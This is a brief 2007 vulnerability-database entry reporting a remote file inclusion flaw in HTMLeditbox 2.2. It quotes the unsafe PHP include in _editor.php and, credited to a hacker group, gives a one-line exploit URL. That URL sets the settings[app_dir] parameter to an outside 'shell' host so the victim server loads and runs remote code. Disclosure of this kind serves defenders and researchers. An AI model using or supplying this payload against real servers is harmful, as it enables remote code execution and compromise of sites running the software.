Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16852
HistoryApr 25, 2007 - 12:00 a.m.

HTMLeditbox & 2.2 >> RFI

2007-04-2500:00:00
vulners.com
118

+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++